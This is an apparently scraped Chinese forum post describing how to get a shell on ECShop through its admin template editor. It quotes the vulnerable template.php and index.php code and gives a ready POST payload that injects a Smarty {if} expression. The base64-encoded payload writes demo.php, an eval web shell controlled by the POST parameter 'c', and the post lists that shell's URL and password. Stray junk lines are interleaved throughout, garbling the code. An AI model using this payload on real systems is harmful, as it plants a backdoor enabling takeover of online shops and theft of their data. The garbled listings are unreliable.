Ecshop后台getshell

admin

首先 ecshop用的是smarty 这样就可以通过它的fetch函数来执行模板

而模板里面可以执行他定义的php代码，这样只要可以写出模板 然后找到调用就可以拿到shell了
但是ecshop似乎不支持{php}{/php}这个标签来执行php代码
$ i  d* U( O0 f( |; z2 }admin/template.php
! Q: c( b  i4 r+ n& G
1 if ($_REQUEST['act'] == 'update_library')
. E& q+ X" k9 r- u% Y  _7 ^( @/ a+ i( y
2 [+ w+ G/ E3 K% h8 M2   
( |  ^, }5 n/ ]# Y7 x2 P
) ^( J/ f  S! M$ j7 M3 {
! Z, e6 A' o7 S0 X' t
4     check_authz_json('library_manage');
9 _9 [/ Y* B8 }! l5 }, F3 u* E- ?
5   
) L0 d. w* y: M
# [# F  C/ b3 Y6     $html = stripslashes(json_str_iconv($_POST['html']));

; _8 t9 g" |. B0 C$ G7   
  H6 d2 I. e* u) p% e. Y7 P* ?* m4 U
8     $lib_file = '../themes/' . $_CFG['template'] . '/library/' .$_POST['lib'] . '.lbi'; //模板文件
% Z, S% `% L# Y, g
; p. \9 S6 w, k9 D8 M8 U8 n/ ]- }9   
, x# j' l' K  t' i
7 H* D* [% |/ ~4 P% s10     $lib_file = str_replace("0xa", '', $lib_file); // 过滤 0xa 非法字符
2 j0 O2 N- t, A) h- h8 `3 u
: `& i$ I5 x4 S9 g$ k11   

12     $org_html = str_replace("\xEF\xBB\xBF", '',file_get_contents($lib_file));

7 u% E: u8 I4 ]  E6 I4 O( A( H13   

' t% O: y& X6 R6 D14     if (@file_exists($lib_file) === true && @file_put_contents($lib_file,$html))//写出

15     {
+ i$ W; W% g3 ?
/ S  ^; z7 k3 g- k& I# ]7 B! }16         @file_put_contents('../temp/backup/library/' . $_CFG['template'] .'-' . $_POST['lib'] . '.lbi', $org_html);

( ^) o7 Q" A9 R- l4 [3 [+ N17         make_json_result('', $_LANG['update_lib_success']);
( h! c3 T8 M" w  f1 U7 O1 V
18     }

19     else
* f) ^' ?0 z6 N5 q
6 G5 \5 Z  S) h+ m9 c+ }& B3 T20     {

21         make_json_error(sprintf($_LANG['update_lib_failed'], 'themes/' .$_CFG['template'] . '/library'));

22     }
+ f' K# D# g1 C+ |
23 }
4 m7 ?3 e# j2 l. j) u& @8 L% O0 k
那么找个比较方便调用了模板的文件
- o6 ?& w) [8 g# Findex.php
! v- l( L% E; x' O! O' G8 C
/ B  n* ~. U) B: ~1 if ($act == 'cat_rec')

2 B4 M6 M  l8 k" ]4 @2 k2 E( W2   

3 {
. L" S3 o/ C% w4 d
4   
  _8 [- E' D" {& s$ G* N9 k7 E
* _+ f) h/ n5 F: E" W5     $rec_array = array(1 => 'best', 2 => 'new', 3 => 'hot');

- ^' N, q# I: l  y6   

7     $rec_type = !empty($_REQUEST['rec_type']) ?intval($_REQUEST['rec_type']) : '1';

& I# ^/ u0 T! T7 Y: w- G8   

9     $cat_id = !empty($_REQUEST['cid']) ? intval($_REQUEST['cid']) : '0';

10   

7 d, {5 R9 @( [11     include_once('includes/cls_json.php');

' ?8 e/ @' @  H+ H  z9 u12   
! e8 W: ~/ Q/ V9 i$ `
13     $json = new JSON;
" e- x& `8 s, t+ M( c/ m$ w
14   
/ |9 {# j' F( I
15     $result   = array('error' => 0, 'content' => '', 'type' => $rec_type,'cat_id' => $cat_id);
$ R# S7 ~* y( a2 e/ I1 Y  p4 d- Z- ?
16   
9 \+ H, H8 d% p0 _6 r) e
) a/ l/ S. i6 k$ E17     $children = get_children($cat_id);

$ G9 n2 {( p# T9 G* {' r8 H18   

19     $smarty->assign($rec_array[$rec_type] . '_goods',      get_category_recommend_goods($rec_array[$rec_type], $children));    // 推荐商品
6 V6 s& p% ~& K* e3 l/ ]
20   

1 u5 @" ^( D$ M  I. ^5 r21     $smarty->assign('cat_rec_sign', 1);
- \# ?4 S6 C( b
7 B+ k9 x7 ^; |; j22   
% D$ p# [* X- ^" [
) `  C( I! [: k0 q3 @: ^23     $result['content'] = $smarty->fetch('library/recommend_' .$rec_array[$rec_type] . '.lbi');//使用了模板文件 该模板文件为recommend_best

' g8 `" a/ @& Z3 ]24   

: w: _* f# m' ~9 i25         echo 'library/recommend_' . $rec_array[$rec_type] . '.lbi';

! d. q5 s; e6 T4 W* a26   
: o2 c5 R, R- K- |; Z, W/ d
27         echo $rec_array[$rec_type];

: Y( Z/ q- |" _8 t4 `0 x6 m28   
9 a9 T! s2 A% g, t
29     die($json->encode($result));

30   

31 }
8 n4 W. F& V# T  \: E5 E
那么就有利用方法了
5 w( j+ b. Z; }4 \post包到http://localhost/ec/admin/template.php?act=update_library
$ h* i+ q6 S/ N" xPost内容：
7 x7 }( P/ h2 {& g- r* F0 I$ N+ `/ i
​
- f/ n/ r4 C) Z' C1 F+ h  G' s1 lib=recommend_best&html={iffputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}16086{/if}

: {# I: ~. T3 v2 w  }& t然后访问http://localhost/ec/index.php?act=cat_rec
7 _& t* ^- }  |# g) \  U
+ w" y  [3 b/ o0 e( ~; P9 }shel地址：http://localhost/ec/demo.php
: @* ]# ?) J- j; x+ [密码c

; n7 I! X7 o2 _% i; [